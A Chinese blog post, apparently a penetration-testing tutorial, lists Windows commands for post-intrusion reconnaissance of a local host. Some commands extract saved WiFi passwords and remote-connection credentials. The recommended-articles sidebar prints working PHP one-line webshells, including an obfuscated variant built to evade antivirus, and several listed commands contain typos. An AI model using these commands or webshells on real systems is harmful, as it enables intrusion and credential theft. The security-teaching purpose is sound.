内网渗透-本机信息搜集

最新推荐文章于 2023-02-27 12:02:54 发布
最新推荐文章于 2023-02-27 12:02:54 发布
阅读量327 收藏
点赞数 1
分类专栏: 信息搜集笔记 内网渗透 文章标签: 内网渗透 信息搜集 安全
本文链接:https://blog.csdn.net/weixin_43221560/article/details/110742008
版权

作者:小刚
一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢
本实验仅用于信息防御教学,切勿用于其它用途

本机信息搜集

本机信息搜集

搜集有用信息,主要是用来提权

用户权限

whoami /all #查看当前用户权限
hostname	#主机信息
net user	#用户列表
net localgroup	#查看所有组名,了解职能
net localgroup "Administratorss"	#查看指定组中的成员列表
Get-LocalGroupMember Administrators | ft Name,PrincipalSource	#powershell查看用户
icacls/cacls	#查看文件权限
accesschk	#查看acl

用户登录情况

query user	#查看机器在线用户,注意管路员
qwinsta
query session	#查看在线用户

系统基本信息

ipconfig /all	#ip地址
systeminfo		#系统信息
echo %PROCESSOR_ARCHITECTURE%  	#查看系统体系,x86还是AMD64
schtasks /query /fo LIST /v 	#查看系统计划任务
DRIVERQUERY 	#查看驱动
net statistics workstation  #查看主机开机时间
net start 	#查看启动的服务
wmic service list brief		#查看服务信息
wmic startup get command,caption	#查看程序启动信息
wmic logicaldisk get caption,description,providername	#查看驱动器
wmic OS get Caption,CSDVersion,OSArchitecture,Version	#查看当前操作系统
Get-PSDrive | where{$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}|ft Name,Root	#powershell查看驱动器
[io.directory]::getfiles("\\.\pipe\")	#powershell查看所有管道

网络信息

rount print 
arp -A 	#路由器和路由表
netstat -ano 	#主机tcp,UDP端口及pid
netstat -anob 	#和发起的程序
net share	#查看主机共享列表,和可访问的共享列表
wmic share get name,path,status
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"	#查看代理情况

配置信息

type C:\\windows\system32\drivers\etc\hosts		#host信息
type C:\\windows\system32\inetsrv\config\applicationHost.config		#查看iis配置信息
wmic startup get caption,command	#查看开机自启动
Get-Cimlnstance Win32_StartupCommand | select Name,command,Location,User | fl	#powershell查看自启动
netsh wlan show profiles	#查看wifi的用户信息
netsh wlan show profiles 666 key=clear	#查看666的wlan密码

本地安装程序

tasklist /svc	 #显示在本地或远程机器上当前运行的进程列表
vmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List	#查看杀软安装情况
vmic product get name,version	#查看软件安装和版本信息
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_Product get name /FORMAT:table	#获取本地安装程序
Get-WmiObject -class Win32_Product | Select-Object -Property name	#powershell获取本地安装程序

获取远程连接信息

工具:
https://github.com/Arvanaghi/SessionGopher

msf: post/windows/gather/credentials/vnc
cmdkey /l	#远程桌面连接历史

整理的文档和工具
在这里插入图片描述
可关注微信公众号:XG小刚
回复:内网信息搜集
在这里插入图片描述

XG小刚
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3072
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
信息收集——域名信息获取
海纳百川
02-08 2723
文章目录一、域名介绍1. 域名定义2. 域名与IP二、收集域名信息1. 利用whois查询2. ICP备案查询三、收集子域名子域名挖掘工具: 一、域名介绍 1. 域名定义 域名(Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识。 2. 域名与IP 当我们访问一个网址时,我们既可以通过它的域名进行访问,...
渗透测试 | 域名信息收集
尼泊罗河伯的博客
11-05 1232
信息收集可以说是在渗透测试中最重要的一部分,上文对 IP 信息收集做了一个简要的叙述,认识了 CDN 技术和网络空间搜索引擎。但是很多网站的主站因为访问流量过大的原因通常会使用 CDN 技术,同时也可以有效防止 DDOS 攻击。在域名信息收集时,主要是因为一些网站的主站过于强大,一时间没有过多的思路。这时如果进行了域名信息收集,发现其有很多分站,那么就有利于渗透测试的进行,毕竟分站越多,网站的漏洞存在可能性就越大。
Web—信息收集(非常全)
qq_50854662的博客
02-27 2142
Web—信息收集(非常全)
免杀一句话
weixin_45647970的博客
03-25 333
<?php array_map($_GET[func], array($_POST[cmd])); ?> 利用方式http://localhost/dvwa/hackable/uploads/nb.php?func=assert 密码为cmd ----------------------------------------------------------------------------------------- <?php $_GET['a']($_POST['b']);
[HACK学习呀] - 2020-08-23 内网渗透 - 内网中的信息收集1
08-03
=域特征=[需要域用户才能成功查询]工作组内信息收集工作组采取的一般都是常规渗透方法,因为工作组一般都是个人和少数服务器通常使用的方法有:扫描网段中的web服务
红蓝对抗之Windows内网渗透-腾讯SRC出品1
08-03
【红蓝对抗之Windows内网渗透】是一种网络安全实践,旨在暴露系统漏洞并提高安全防护能力。在企业环境中,外部防御通常严密,但内部网络的安全状况可能相对较弱,因此攻击者常利用员工电脑、外网服务或WiFi等途径...
内网渗透测试-提权工具
05-25
内网渗透测试是信息安全领域中的一个重要环节,主要目的是模拟黑客攻击行为,以发现并修复组织内部网络中的安全漏洞。在这个过程中,提权是关键的一环,它指的是在获取了低权限账户后,尝试升级到管理员权限,从而...
渗透测试 _ 内网信息收集1
08-03
前言在内网渗透测试中,信息收集的深度与广度,直接关系到整个内网渗透测试的成败,本篇文章主要对内网信息收集做简单介绍~一、内网信息描述当渗透测试人员进入内网后,面
fscan内网渗透神器
09-21
(1)信息搜集: 存活探测(icmp) 端口扫描 (2)爆破功能: 各类服务爆破(ssh、smb、rdp等) 数据库密码爆破(mysql、mssql、redis、psql、oracle等) (3)系统信息、漏洞扫描: netbios探测、域控识别 获取目标...
PHP一句话 免杀版
10-23
PHP一句话 免杀版
PHP大马过狗代码.php
05-31
该文件为PHP代码的大马,通过该文件,可以很好的绕过安全狗的检测,进而链接服务器。相关链接为https://download.csdn.net/download/wychy2008/10318498
域名信息收集--渗透测试
weixin_45300266的博客
01-16 3713
一、域名简介: 二、子域名查询 三、注册信息查询 四、备案信息查询
免杀学习——PHP免杀
ZxC789456302的博客
10-23 1752
php上马免杀,理论上是只要绕过waf就可以,但特殊情况下存在驻场人员手动监控,看到一些奇怪的参就直接给你ban了,所以各位师傅尽量不要在一些敏感时期进行渗透测试,仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com),里面还有一些扩展,十分详细。
域名信息收集
m0_56065966的博客
02-04 134
轻松查询域名信息
信息收集之子域名收集
cdyunaq的博客
05-12 2630
上一次我们分享了主域名收集的思路和方法,但除了主域名外,子域名也是域名信息收集中的一个重要环节,在当今各种防护设备满天飞的情况下,想要拿下主域名越来越难,但我们可以使用迂回策略,从子域名下手,慢慢靠近主域名以达到shell的目的。 子域名收集可以帮助我们发现目标对外开放的更多的资产,如果能找到一些被遗忘或目标不关注的子域名,将其作为突破点,可能达到事半功倍的效果。 子域名收集的方式很多,但如何尽可能全的收集到所有的子域名却不是那么容易的事儿;本次将从手工和工具两种方式为大家进行讲解。 手工操作 证书
php一句话免杀尝试
qq_53263789的博客
02-24 620
<?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> 利用数学函数进行异或构造,从中寻找可用函数,没找到eval,找到了ass
不可不学!一些webshell免杀的技巧
Appleteachers的博客
05-07 794
一些webshell免杀的技巧 0x00:前言 由于杀软的规则在不断更新 所以很多之前的过杀软方法基本上都不行了 而且随着php7逐渐扩张 assert马也将被淘汰 所以本文将提出几种免杀思路 效果很好 而且不会被杀软的正则和沙盒规则约束。 0x01:自定义加密Bypass 部分杀软会直接将一些编码函数如Base64、编码后的关键字或组合函数加入了规则 比如某dir+ 比如这个 都能被检测出是shell 所以为了防止这种的规则 自定义加密显然是最优解 自定义加密可选性多了 只要能把加密后的字符还原回去就行
内网渗透流程与思路和工具讲解
最新发布
04-10
工具如`whoami&ipconfig/all`用于获取本机信息,`netstat-ano`监控网络连接状态,`systeminfo`查看系统版本和补丁。 - **案例分享**:通过案例分析展示了如何在实际环境中应用这些工具,如查看RDP连接记录、检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值